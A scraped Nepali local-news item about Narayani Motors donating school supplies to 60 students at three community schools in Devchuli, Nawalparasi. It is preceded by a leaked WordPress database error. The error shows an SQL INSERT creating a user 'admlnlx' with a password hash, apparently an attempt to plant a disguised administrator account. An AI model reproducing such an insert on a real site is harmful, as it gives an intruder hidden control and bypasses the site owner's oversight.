WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbdKaBZjt6EUQkMQWsHnmZ3WLoVcxY0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 13:08:21', '', 'admlnlx', 'admlnlx')
नवलपरासी, पुस ११–
नारायणी मोटर्स नारायणगढले नवलपरासीको देवचुली नगरपालिकामा रहेको देवचुली आधारभुत विद्यालय, दिव्य ज्योति आधारभुत विद्यालय र मनकामना आधारभुत विद्यालयका असहाय तथा जेहेन्दार विद्यार्थीलाई शैक्षिक सामाग्री सहयोग गरेको छ ।
आज (सोमबार)देवचुली नगरपालिकाको तीनवटा सामुदायिक विद्यालयका ६० जना विद्यार्थीलाई शैक्षिक सामाग्री वितरण गरिएको हो ।
कार्यक्रममा बोल्दै नारायणी मोटर्स प्रमुख बालगोपाल चुकेले असहाय, अनाथ तथा जेहेन्दार विद्यार्थीको उज्जवल भविष्यका लागि सो सामाग्री वितरण गर्न पाएकोमा खुशी व्यक्त गर्नुभयो । उहाँले आगामी दिनमा सो विद्यालयका विद्यार्थीहरुलाई सहयोग गर्ने प्रतिबद्धता जनाउनुभयो ।
मनकामना अधारभुत विद्यालयमा भएको कार्यक्रम नारायणी मोटर्सकी अनुसा चुके, युवा व्यवसायी शेरबहादुर पौडेल, परिवर्तनका लागि युवा नेपालका राजु चापागाई, टीकाराम राना, प्रबिन पुलामीलगायतको उपस्थितिमा रहेको थियो । कार्यक्रमलाई समन्वय परिवर्तनको लागि युवा नेपालले संयोजन गरेको थियो ।